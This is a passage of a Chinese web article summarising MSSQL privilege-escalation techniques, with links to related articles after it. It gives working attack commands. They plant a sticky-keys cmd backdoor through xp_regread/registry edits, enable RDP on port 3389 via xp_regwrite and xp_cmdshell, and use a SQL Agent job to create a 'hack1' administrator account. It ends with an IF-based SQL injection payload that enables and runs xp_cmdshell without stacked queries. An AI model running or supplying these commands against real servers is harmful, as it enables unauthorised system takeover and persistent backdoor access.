exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','Debugger'

e67520e8-404d-11ed-b1c7-dac502259ad0.png

顯示已修改為cmd.exe

在目標(biāo)主機(jī)上查看,結(jié)果一致

e6894b54-404d-11ed-b1c7-dac502259ad0.png

5)驗(yàn)證是否成功

連按5次粘滯鍵,彈出cmd框

e6a570cc-404d-11ed-b1c7-dac502259ad0.png

拓展

上面對只是對粘滯鍵進(jìn)行修改,類似的,可以在注冊表中進(jìn)行其他操作

刪除指定注冊表鍵值對

刪除粘滯鍵的鍵值

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe'

e6d58564-404d-11ed-b1c7-dac502259ad0.png

到目標(biāo)主機(jī)上查看,發(fā)現(xiàn)sethc.exe在注冊表中的值已刪除

e6ea732a-404d-11ed-b1c7-dac502259ad0.png

開啟3389端口

這里的xp_regwrite為向注冊表中寫數(shù)據(jù)

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;

exec master..xp_cmdshell "REG ADD 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 0"

e7179a30-404d-11ed-b1c7-dac502259ad0.png

在注冊表中也可以看到3389端口被打開

e73bf3c6-404d-11ed-b1c7-dac502259ad0.png

JOB提權(quán)

原理是創(chuàng)建一個(gè)任務(wù)X,并執(zhí)行命令,對于命令執(zhí)行后的結(jié)果將返回給文檔job.txt

詳細(xì)過程

1、 啟動sqlagent服務(wù)

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

2、 創(chuàng)建任務(wù)X,X為任務(wù)名稱并執(zhí)行命令,命令執(zhí)行后的結(jié)果將返回給文檔job.txt

use msdb
exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user hack1 hack1 /add &net localgroup administrators hack1 /add>c:/job.txt"'
exec sp_add_jobserver null,'x',@@servername
exec sp_start_job 'x';

3、再查看用戶發(fā)現(xiàn)hack1用戶存在且已經(jīng)在管理員組里面

無法堆疊的情況下執(zhí)行系統(tǒng)命令

https://blog.51cto.com/u_15127627/4024124

那么 exec 真的需要多句才能執(zhí)行嗎?,來直接看 payload 吧

e785daea-404d-11ed-b1c7-dac502259ad0.png

if 語句的表達(dá)式如下,也就是說,我們是可以借助 if 來執(zhí)行 sql_statement,那么只要你能在你的注入點(diǎn)構(gòu)造一個(gè) if 出來,不需要環(huán)境支持堆疊也可以達(dá)到堆疊的效果。

IF Boolean_expression   
     { sql_statement | statement_block }   
[ ELSE   
     { sql_statement | statement_block } ]

e7a6d934-404d-11ed-b1c7-dac502259ad0.png

完整的 payload

select 1 where 1=1 if 1=1 execute('exec sp_configure ''show advanced options'', 
1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell 
''whoami''');




審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
  • SQL數(shù)據(jù)庫
    +關(guān)注

    關(guān)注

    0

    文章

    25

    瀏覽量

    6915
  • OLE
    OLE
    +關(guān)注

    關(guān)注

    0

    文章

    14

    瀏覽量

    11624

原文標(biāo)題:MSSQL提權(quán)全總結(jié)

文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    權(quán)限提升之Mysql權(quán)

    權(quán)限提升之Mysql權(quán)
    發(fā)表于 09-07 10:50 ?4次下載
    權(quán)限提升之Mysql<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>

    常見的權(quán)方法與運(yùn)維建議

    常見的權(quán)方法與運(yùn)維建議
    發(fā)表于 09-07 11:23 ?4次下載
    常見的<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>方法與運(yùn)維建議

    Webshell權(quán)登陸服務(wù)器

    Webshell權(quán)登陸服務(wù)器
    發(fā)表于 09-07 14:04 ?4次下載
    Webshell<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>登陸服務(wù)器

    Linux內(nèi)核權(quán)攻擊研究

    權(quán)攻擊是針對Linux系統(tǒng)的種重要攻擊手段。根據(jù)權(quán)攻擊所利用的漏洞類型,般可將其分為應(yīng)用
    發(fā)表于 11-24 11:46 ?0次下載
    Linux內(nèi)核<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>攻擊研究

    詳解精密封裝技術(shù)

    詳解精密封裝技術(shù)
    的頭像 發(fā)表于 12-30 15:41 ?1670次閱讀

    詳解分立元件門電路

    詳解分立元件門電路
    的頭像 發(fā)表于 03-27 17:44 ?3198次閱讀
    <b class='flag-5'>一</b><b class='flag-5'>文</b><b class='flag-5'>詳解</b>分立元件門電路

    初涉內(nèi)網(wǎng)權(quán)方面詳解

    ? 口水話 ? 前段時(shí)間打了兩個(gè)靶場 由于內(nèi)網(wǎng)接觸的不多 這里在結(jié)束之后惡補(bǔ)了一下相關(guān)方面的知識,對于初涉內(nèi)網(wǎng)的小白來說,可以作為個(gè)較好的參考。由于本文主要介紹
    的頭像 發(fā)表于 05-22 09:56 ?647次閱讀
    初涉內(nèi)網(wǎng)<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>方面<b class='flag-5'>詳解</b>

    款數(shù)據(jù)庫自動化權(quán)工具

    款用Go語言編寫的數(shù)據(jù)庫自動化權(quán)工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis數(shù)據(jù)庫
    的頭像 發(fā)表于 07-19 14:57 ?707次閱讀
    <b class='flag-5'>一</b>款數(shù)據(jù)庫自動化<b class='flag-5'>提</b><b class='flag-5'>權(quán)</b>工具

    太陽能光伏相關(guān)知識詳解

    電子發(fā)燒友網(wǎng)站提供《太陽能光伏相關(guān)知識詳解.pdf》資料免費(fèi)下載
    發(fā)表于 10-08 09:32 ?0次下載
    太陽能光伏<b class='flag-5'>相關(guān)</b><b class='flag-5'>知識</b><b class='flag-5'>詳解</b>

    詳解pcb和smt的區(qū)別

    詳解pcb和smt的區(qū)別
    的頭像 發(fā)表于 10-08 09:31 ?3373次閱讀

    詳解pcb地孔的作用

    詳解pcb地孔的作用
    的頭像 發(fā)表于 10-30 16:02 ?1665次閱讀

    詳解pcb不良分析

    詳解pcb不良分析
    的頭像 發(fā)表于 11-29 17:12 ?1177次閱讀

    詳解pcb的msl等級

    詳解pcb的msl等級
    的頭像 發(fā)表于 12-13 16:52 ?9712次閱讀

    詳解pcb微帶線設(shè)計(jì)

    詳解pcb微帶線設(shè)計(jì)
    的頭像 發(fā)表于 12-14 10:38 ?3307次閱讀

    詳解pcb的組成和作用

    詳解pcb的組成和作用
    的頭像 發(fā)表于 12-18 10:48 ?1559次閱讀